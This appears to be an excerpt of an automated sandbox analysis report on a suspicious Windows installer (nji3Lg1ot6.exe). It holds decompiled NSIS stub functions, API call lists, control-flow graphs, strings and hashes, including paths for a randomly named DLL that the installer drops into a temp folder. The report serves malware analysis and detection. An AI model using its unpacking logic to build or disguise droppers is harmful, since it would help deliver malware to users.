                      						_v20 = 0x624e5f;
                      						 *0x423644 = E00401000;
                      						 *0x423650 = _t75;
                      						 *0x423664 =  &_v20;
                      						if(RegisterClassA(0x423640) == 0) {
                      							L33:
                      							__eflags = 0;
                      							return 0;
                      						}
                      						_t12 =  &_v16; // 0x624e5f
                      						SystemParametersInfoA(0x30, 0, _t12, 0);
                      						 *0x420470 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423ea0, 0);
                      						goto L21;
                      					}
                      				} else {
                      					_t75 =  *(_t80 + 0x48);
                      					if(_t75 == 0) {
                      						goto L16;
                      					}
                      					_t59 =  *0x423ed8; // 0x4e2694
                      					_t78 = 0x422e40;
                      					E0040596C( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x422e40, 0);
                      					_t61 =  *0x422e40; // 0x62
                      					if(_t61 == 0) {
                      						goto L16;
                      					}
                      					if(_t61 == 0x22) {
                      						_t78 = 0x422e41;
                      						 *((char*)(E004055A3(0x422e41, 0x22))) = 0;
                      					}
                      					_t63 = lstrlenA(_t78) + _t78 - 4;
                      					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
                      						L15:
                      						E00405A85(_t84, E00405578(_t78));
                      						goto L16;
                      					} else {
                      						_t67 = GetFileAttributesA(_t78);
                      						if(_t67 == 0xffffffff) {
                      							L14:
                      							E004055BF(_t78);
                      							goto L15;
                      						}
                      						_t95 = _t67 & 0x00000010;
                      						if((_t67 & 0x00000010) != 0) {
                      							goto L15;
                      						}
                      						goto L14;
                      					}
                      				}
                      			}

                      APIs
                        • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                        • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                        • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                      • lstrcatA.KERNEL32(1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403654
                      • lstrlenA.KERNEL32(bxrmcpz,?,?,?,bxrmcpz,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000,00000006,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ), ref: 004036BF
                      • lstrcmpiA.KERNEL32(?,.exe,bxrmcpz,?,?,?,bxrmcpz,00000000,C:\Users\user\AppData\Local\Temp,1033,00420498,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420498,00000000), ref: 004036D2
                      • GetFileAttributesA.KERNEL32(bxrmcpz), ref: 004036DD
                      • LoadImageA.USER32 ref: 00403726
                        • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                      • RegisterClassA.USER32 ref: 0040376D
                      • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403785
                      • CreateWindowExA.USER32 ref: 004037BE
                      • ShowWindow.USER32(00000005,00000000), ref: 004037F0
                      • LoadLibraryA.KERNEL32(RichEd20), ref: 00403801
                      • LoadLibraryA.KERNEL32(RichEd32), ref: 0040380C
                      • GetClassInfoA.USER32 ref: 0040381C
                      • GetClassInfoA.USER32 ref: 00403829
                      • RegisterClassA.USER32 ref: 00403832
                      • DialogBoxParamA.USER32 ref: 00403851
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                      • String ID: "C:\Users\user\Desktop\nji3Lg1ot6.exe" $.DEFAULT\Control Panel\International$.exe$1033$@6B$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$bxrmcpz$hM
                      • API String ID: 914957316-2201983962
                      • Opcode ID: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                      • Instruction ID: 5423f1521edd6c22147bc7c07d225ef67cd2e9978b4dd0bca8e1ac87d1580d65
                      • Opcode Fuzzy Hash: 1b836ab39891d0ed633b9e8fdaad556c57e04705e63d575667ba9658825fde44
                      • Instruction Fuzzy Hash: 3A61C0B1644200BED6306F65AC45E3B3AADEB4474AF44457FF940B22E1C77DAD058A2E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 177 402c5b-402ca9 GetTickCount GetModuleFileNameA call 40575c 180 402cb5-402ce3 call 405a85 call 4055bf call 405a85 GetFileSize 177->180 181 402cab-402cb0 177->181 189 402dd3-402de1 call 402bc5 180->189 190 402ce9-402d00 180->190 182 402efa-402efe 181->182 197 402eb2-402eb7 189->197 198 402de7-402dea 189->198 191 402d02 190->191 192 402d04-402d0a call 4031a8 190->192 191->192 196 402d0f-402d11 192->196 199 402d17-402d1d 196->199 200 402e6e-402e76 call 402bc5 196->200 197->182 201 402e16-402e62 GlobalAlloc call 405e7d call 40578b CreateFileA 198->201 202 402dec-402dfd call 4031da call 4031a8 198->202 204 402d9d-402da1 199->204 205 402d1f-402d37 call 40571d 199->205 200->197 228 402e64-402e69 201->228 229 402e78-402ea8 call 4031da call 402f01 201->229 220 402e02-402e04 202->220 209 402da3-402da9 call 402bc5 204->209 210 402daa-402db0 204->210 205->210 223 402d39-402d40 205->223 209->210 216 402db2-402dc0 call 405e0f 210->216 217 402dc3-402dcd 210->217 216->217 217->189 217->190 220->197 225 402e0a-402e10 220->225 223->210 227 402d42-402d49 223->227 225->197 225->201 227->210 230 402d4b-402d52 227->230 228->182 236 402ead-402eb0 229->236 230->210 233 402d54-402d5b 230->233 233->210 235 402d5d-402d7d 233->235 235->197 237 402d83-402d87 235->237 236->197 238 402eb9-402eca 236->238 239 402d89-402d8d 237->239 240 402d8f-402d97 237->240 242 402ed2-402ed7 238->242 243 402ecc 238->243 239->189 239->240 240->210 241 402d99-402d9b 240->241 241->210 244 402ed8-402ede 242->244 243->242 244->244 245 402ee0-402ef8 call 40571d 244->245 245->182
                      C-Code - Quality: 96%
                      			E00402C5B(void* __eflags, signed int _a4) {
                      				long _v8;
                      				long _v12;
                      				intOrPtr _v16;
                      				long _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				signed int _v40;
                      				char _v300;
                      				signed int _t54;
                      				void* _t57;
                      				void* _t62;
                      				signed int _t63;
                      				intOrPtr _t65;
                      				void* _t68;
                      				intOrPtr* _t70;
                      				intOrPtr _t71;
                      				signed int _t77;
                      				signed int _t79;
                      				signed int _t82;
                      				signed int _t83;
                      				signed int _t89;
                      				intOrPtr _t92;
                      				signed int _t101;
                      				signed int _t103;
                      				void* _t105;
                      				signed int _t106;
                      				signed int _t109;
                      				void* _t110;
                      
                      				_v8 = 0;
                      				_v12 = 0;
                      				 *0x423eac = GetTickCount() + 0x3e8;
                      				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\nji3Lg1ot6.exe", 0x400);
                      				_t105 = E0040575C("C:\\Users\\hardz\\Desktop\\nji3Lg1ot6.exe", 0x80000000, 3);
                      				 *0x409010 = _t105;
                      				if(_t105 == 0xffffffff) {
                      					return "Error launching installer";
                      				}
                      				E00405A85("C:\\Users\\hardz\\Desktop", "C:\\Users\\hardz\\Desktop\\nji3Lg1ot6.exe");
                      				E00405A85(0x42b000, E004055BF("C:\\Users\\hardz\\Desktop"));
                      				_t54 = GetFileSize(_t105, 0);
                      				__eflags = _t54;
                      				 *0x41f048 = _t54;
                      				_t109 = _t54;
                      				if(_t54 <= 0) {
                      					L22:
                      					E00402BC5(1);
                      					__eflags =  *0x423eb4; // 0x7e00
                      					if(__eflags == 0) {
                      						goto L30;
                      					}
                      					__eflags = _v12;
                      					if(_v12 == 0) {
                      						L26:
                      						_t57 = GlobalAlloc(0x40, _v20); // executed
                      						_t110 = _t57;
                      						E00405E7D(0x40afb0);
                      						E0040578B( &_v300, "C:\\Users\\hardz\\AppData\\Local\\Temp\\"); // executed
                      						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                      						__eflags = _t62 - 0xffffffff;
                      						 *0x409014 = _t62;
                      						if(_t62 != 0xffffffff) {
                      							_t63 =  *0x423eb4; // 0x7e00
                      							_t65 = E004031DA(_t63 + 0x1c);
                      							 *0x41f04c = _t65;
                      							 *0x417040 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                      							_t68 = E00402F01(_v16, 0xffffffff, 0, _t110, _v20); // executed
                      							__eflags = _t68 - _v20;
                      							if(_t68 == _v20) {
                      								__eflags = _v40 & 0x00000001;
                      								 *0x423eb0 = _t110;
                      								 *0x423eb8 =  *_t110;
                      								if((_v40 & 0x00000001) != 0) {
                      									 *0x423ebc =  *0x423ebc + 1;
                      									__eflags =  *0x423ebc;
                      								}
                      								_t45 = _t110 + 0x44; // 0x44
                      								_t70 = _t45;
                      								_t101 = 8;
                      								do {
                      									_t70 = _t70 - 8;
                      									 *_t70 =  *_t70 + _t110;
                      									_t101 = _t101 - 1;
                      									__eflags = _t101;
                      								} while (_t101 != 0);
                      								_t71 =  *0x41703c; // 0x3d90c
                      								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
                      								E0040571D(0x423ec0, _t110 + 4, 0x40);
                      								__eflags = 0;
                      								return 0;
                      							}
                      							goto L30;
                      						}
                      						return "Error writing temporary file. Make sure your temp folder is valid.";
                      					}
                      					E004031DA( *0x417038);
                      					_t77 = E004031A8( &_a4, 4); // executed
                      					__eflags = _t77;
                      					if(_t77 == 0) {
                      						goto L30;
                      					}
                      					__eflags = _v8 - _a4;
                      					if(_v8 != _a4) {
                      						goto L30;
                      					}
                      					goto L26;
                      				} else {
                      					do {
                      						_t79 =  *0x423eb4; // 0x7e00
                      						_t106 = _t109;
                      						asm("sbb eax, eax");
                      						_t82 = ( ~_t79 & 0x00007e00) + 0x200;
                      						__eflags = _t109 - _t82;
                      						if(_t109 >= _t82) {
                      							_t106 = _t82;
                      						}
                      						_t83 = E004031A8(0x417048, _t106); // executed
                      						__eflags = _t83;
                      						if(_t83 == 0) {
                      							E00402BC5(1);
                      							L30:
                      							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                      						}
                      						__eflags =  *0x423eb4; // 0x7e00
                      						if(__eflags != 0) {
                      							__eflags = _a4 & 0x00000002;
                      							if((_a4 & 0x00000002) == 0) {
                      								E00402BC5(0);
                      							}
                      							goto L19;
                      						}
                      						E0040571D( &_v40, 0x417048, 0x1c);
                      						_t89 = _v40;
                      						__eflags = _t89 & 0xfffffff0;
                      						if((_t89 & 0xfffffff0) != 0) {
                      							goto L19;
                      						}
                      						__eflags = _v36 - 0xdeadbeef;
                      						if(_v36 != 0xdeadbeef) {
                      							goto L19;
                      						}
                      						__eflags = _v24 - 0x74736e49;
                      						if(_v24 != 0x74736e49) {
                      							goto L19;
                      						}
                      						__eflags = _v28 - 0x74666f73;
                      						if(_v28 != 0x74666f73) {
                      							goto L19;
                      						}
                      						__eflags = _v32 - 0x6c6c754e;
                      						if(_v32 != 0x6c6c754e) {
                      							goto L19;
                      						}
                      						_a4 = _a4 | _t89;
                      						_t103 =  *0x417038; // 0x0
                      						 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
                      						_t92 = _v16;
                      						__eflags = _t92 - _t109;
                      						 *0x423eb4 = _t103;
                      						if(_t92 > _t109) {
                      							goto L30;
                      						}
                      						__eflags = _a4 & 0x00000008;
                      						if((_a4 & 0x00000008) != 0) {
                      							L15:
                      							_v12 = _v12 + 1;
                      							_t109 = _t92 - 4;
                      							__eflags = _t106 - _t109;
                      							if(_t106 > _t109) {
                      								_t106 = _t109;
                      							}
                      							goto L19;
                      						}
                      						__eflags = _a4 & 0x00000004;
                      						if((_a4 & 0x00000004) != 0) {
                      							goto L22;
                      						}
                      						goto L15;
                      						L19:
                      						__eflags = _t109 -  *0x41f048; // 0xc1b
                      						if(__eflags < 0) {
                      							_v8 = E00405E0F(_v8, 0x417048, _t106);
                      						}
                      						 *0x417038 =  *0x417038 + _t106;
                      						_t109 = _t109 - _t106;
                      						__eflags = _t109;
                      					} while (_t109 > 0);
                      					goto L22;
                      				}
                      			}


































                      APIs
                      • GetTickCount.KERNEL32 ref: 00402C6F
                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\nji3Lg1ot6.exe,00000400), ref: 00402C8B
                        • Part of subcall function 0040575C: GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\nji3Lg1ot6.exe,80000000,00000003), ref: 00405760
                        • Part of subcall function 0040575C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                      • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\nji3Lg1ot6.exe,C:\Users\user\Desktop\nji3Lg1ot6.exe,80000000,00000003), ref: 00402CD4
                      • GlobalAlloc.KERNELBASE(00000040,00409128), ref: 00402E1B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                      • String ID: "C:\Users\user\Desktop\nji3Lg1ot6.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\nji3Lg1ot6.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$hM$soft
                      • API String ID: 2803837635-2753512172
                      • Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                      • Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
                      • Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                      • Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 317 401734-401757 call 4029e8 call 4055e5 322 401761-401773 call 405a85 call 405578 lstrcatA 317->322 323 401759-40175f call 405a85 317->323 328 401778-40177e call 405ce3 322->328 323->328 333 401783-401787 328->333 334 401789-401793 call 405d7c 333->334 335 4017ba-4017bd 333->335 343 4017a5-4017b7 334->343 344 401795-4017a3 CompareFileTime 334->344 336 4017c5-4017e1 call 40575c 335->336 337 4017bf-4017c0 call 40573d 335->337 345 4017e3-4017e6 336->345 346 401859-401882 call 404e23 call 402f01 336->346 337->336 343->335 344->343 347 4017e8-40182a call 405a85 * 2 call 405aa7 call 405a85 call 405346 345->347 348 40183b-401845 call 404e23 345->348 360 401884-401888 346->360 361 40188a-401896 SetFileTime 346->361 347->333 380 401830-401831 347->380 358 40184e-401854 348->358 363 402886 358->363 360->361 362 40189c-4018a7 FindCloseChangeNotification 360->362 361->362 365 40287d-402880 362->365 366 4018ad-4018b0 362->366 367 402888-40288c 363->367 365->363 369 4018b2-4018c3 call 405aa7 lstrcatA 366->369 370 4018c5-4018c8 call 405aa7 366->370 376 4018cd-402205 call 405346 369->376 370->376 376->367 384 40264e-402655 376->384 380->358 382 401833-401834 380->382 382->348 384->365
                      C-Code - Quality: 75%
                      			E00401734(FILETIME* __ebx, void* __eflags) {
                      				void* _t33;
                      				void* _t41;
                      				void* _t43;
                      				FILETIME* _t49;
                      				FILETIME* _t62;
                      				void* _t64;
                      				signed int _t70;
                      				FILETIME* _t71;
                      				FILETIME* _t75;
                      				signed int _t77;
                      				void* _t80;
                      				CHAR* _t82;
                      				void* _t85;
                      
                      				_t75 = __ebx;
                      				_t82 = E004029E8(0x31);
                      				 *(_t85 - 8) = _t82;
                      				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
                      				_t33 = E004055E5(_t82);
                      				_push(_t82);
                      				if(_t33 == 0) {
                      					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
                      				} else {
                      					_push(0x409b68);
                      					E00405A85();
                      				}
                      				E00405CE3(0x409b68);
                      				while(1) {
                      					__eflags =  *(_t85 + 8) - 3;
                      					if( *(_t85 + 8) >= 3) {
                      						_t64 = E00405D7C(0x409b68);
                      						_t77 = 0;
                      						__eflags = _t64 - _t75;
                      						if(_t64 != _t75) {
                      							_t71 = _t64 + 0x14;
                      							__eflags = _t71;
                      							_t77 = CompareFileTime(_t71, _t85 - 0x18);
                      						}
                      						asm("sbb eax, eax");
                      						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                      						__eflags = _t70;
                      						 *(_t85 + 8) = _t70;
                      					}
                      					__eflags =  *(_t85 + 8) - _t75;
                      					if( *(_t85 + 8) == _t75) {
                      						E0040573D(0x409b68);
                      					}
                      					__eflags =  *(_t85 + 8) - 1;
                      					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                      					__eflags = _t41 - 0xffffffff;
                      					 *(_t85 - 0x34) = _t41;
                      					if(_t41 != 0xffffffff) {
                      						break;
                      					}
                      					__eflags =  *(_t85 + 8) - _t75;
                      					if( *(_t85 + 8) != _t75) {
                      						E00404E23(0xffffffe2,  *(_t85 - 8));
                      						__eflags =  *(_t85 + 8) - 2;
                      						if(__eflags == 0) {
                      							 *((intOrPtr*)(_t85 - 4)) = 1;
                      						}
                      						L31:
                      						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
                      						__eflags =  *0x423f28;
                      						goto L32;
                      					} else {
                      						E00405A85(0x40a368, 0x424000);
                      						E00405A85(0x424000, 0x409b68);
                      						E00405AA7(_t75, 0x40a368, 0x409b68, "C:\Users\hardz\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dll",  *((intOrPtr*)(_t85 - 0x10)));
                      						E00405A85(0x424000, 0x40a368);
                      						_t62 = E00405346("C:\Users\hardz\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dll",  *(_t85 - 0x24) >> 3) - 4;
                      						__eflags = _t62;
                      						if(_t62 == 0) {
                      							continue;
                      						} else {
                      							__eflags = _t62 == 1;
                      							if(_t62 == 1) {
                      								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
                      								L32:
                      								_t49 = 0;
                      								__eflags = 0;
                      							} else {
                      								_push(0x409b68);
                      								_push(0xfffffffa);
                      								E00404E23();
                      								L29:
                      								_t49 = 0x7fffffff;
                      							}
                      						}
                      					}
                      					L33:
                      					return _t49;
                      				}
                      				E00404E23(0xffffffea,  *(_t85 - 8));
                      				 *0x423f54 =  *0x423f54 + 1;
                      				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
                      				 *0x423f54 =  *0x423f54 - 1;
                      				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                      				_t80 = _t43;
                      				if( *(_t85 - 0x18) != 0xffffffff) {
                      					L22:
                      					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                      				} else {
                      					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                      					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                      						goto L22;
                      					}
                      				}
                      				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
                      				__eflags = _t80 - _t75;
                      				if(_t80 >= _t75) {
                      					goto L31;
                      				} else {
                      					__eflags = _t80 - 0xfffffffe;
                      					if(_t80 != 0xfffffffe) {
                      						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
                      					} else {
                      						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
                      						lstrcatA(0x409b68,  *(_t85 - 8));
                      					}
                      					_push(0x200010);
                      					_push(0x409b68);
                      					E00405346();
                      					goto L29;
                      				}
                      				goto L33;
                      			}

















                      APIs
                      • lstrcatA.KERNEL32(00000000,00000000,bxrmcpz,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                      • CompareFileTime.KERNEL32(-00000014,?,bxrmcpz,bxrmcpz,00000000,00000000,bxrmcpz,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                        • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,jefgbrzfgglybaslbprz Setup,NSIS Error), ref: 00405A92
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                        • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                        • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                        • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                        • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                        • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                        • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                      • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp$C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dll$bxrmcpz
                      • API String ID: 1941528284-202857354
                      • Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                      • Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
                      • Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                      • Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 385 402f01-402f10 386 402f12-402f28 SetFilePointer 385->386 387 402f2e-402f39 call 40302c 385->387 386->387 390 403025-403029 387->390 391 402f3f-402f59 ReadFile 387->391 392 403022 391->392 393 402f5f-402f62 391->393 394 403024 392->394 393->392 395 402f68-402f7b call 40302c 393->395 394->390 395->390 398 402f81-402f84 395->398 399 402ff1-402ff7 398->399 400 402f86-402f89 398->400 403 402ff9 399->403 404 402ffc-40300f ReadFile 399->404 401 40301d-403020 400->401 402 402f8f 400->402 401->390 405 402f94-402f9c 402->405 403->404 404->392 406 403011-40301a 404->406 407 402fa1-402fb3 ReadFile 405->407 408 402f9e 405->408 406->401 407->392 409 402fb5-402fb8 407->409 408->407 409->392 410 402fba-402fcf WriteFile 409->410 411 402fd1-402fd4 410->411 412 402fed-402fef 410->412 411->412 413 402fd6-402fe9 411->413 412->394 413->405 414 402feb 413->414 414->401
                      C-Code - Quality: 93%
                      			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
                      				long _v8;
                      				intOrPtr _v12;
                      				void _t31;
                      				intOrPtr _t32;
                      				int _t35;
                      				long _t36;
                      				int _t37;
                      				long _t38;
                      				int _t40;
                      				int _t42;
                      				long _t43;
                      				long _t44;
                      				intOrPtr _t51;
                      				long _t55;
                      				long _t57;
                      
                      				_t31 = _a4;
                      				if(_t31 >= 0) {
                      					_t51 =  *0x423ef8; // 0x58eb
                      					_t44 = _t31 + _t51;
                      					 *0x41703c = _t44;
                      					SetFilePointer( *0x409014, _t44, 0, 0); // executed
                      				}
                      				_t57 = 4;
                      				_t32 = E0040302C(_t57);
                      				if(_t32 >= 0) {
                      					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
                      					if(_t35 == 0 || _v8 != _t57) {
                      						L23:
                      						_push(0xfffffffd);
                      						goto L24;
                      					} else {
                      						 *0x41703c =  *0x41703c + _t57;
                      						_t32 = E0040302C(_a4);
                      						_v12 = _t32;
                      						if(_t32 >= 0) {
                      							if(_a12 != 0) {
                      								_t36 = _a4;
                      								if(_t36 >= _a16) {
                      									_t36 = _a16;
                      								}
                      								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
                      								if(_t37 == 0) {
                      									goto L23;
                      								} else {
                      									_t38 = _v8;
                      									 *0x41703c =  *0x41703c + _t38;
                      									_v12 = _t38;
                      									goto L22;
                      								}
                      							} else {
                      								if(_a4 <= 0) {
                      									L22:
                      									_t32 = _v12;
                      								} else {
                      									while(1) {
                      										_t55 = 0x4000;
                      										if(_a4 < 0x4000) {
                      											_t55 = _a4;
                      										}
                      										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
                      										if(_t40 == 0 || _t55 != _v8) {
                      											goto L23;
                      										}
                      										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
                      										if(_t42 == 0 || _a16 != _t55) {
                      											_push(0xfffffffe);
                      											L24:
                      											_pop(_t32);
                      										} else {
                      											_t43 = _v8;
                      											_v12 = _v12 + _t43;
                      											_a4 = _a4 - _t43;
                      											 *0x41703c =  *0x41703c + _t43;
                      											if(_a4 > 0) {
                      												continue;
                      											} else {
                      												goto L22;
                      											}
                      										}
                      										goto L25;
                      									}
                      									goto L23;
                      								}
                      							}
                      						}
                      					}
                      				}
                      				L25:
                      				return _t32;
                      			}



















                      APIs
                      • SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,00007DE4), ref: 00402F28
                      • ReadFile.KERNELBASE(00409128,00000004,00007DE4,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
                      • ReadFile.KERNELBASE(00413038,00004000,00007DE4,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,00007DE4), ref: 00402FAF
                      • WriteFile.KERNELBASE(00000000,00413038,00007DE4,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,00007DE4), ref: 00402FC7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
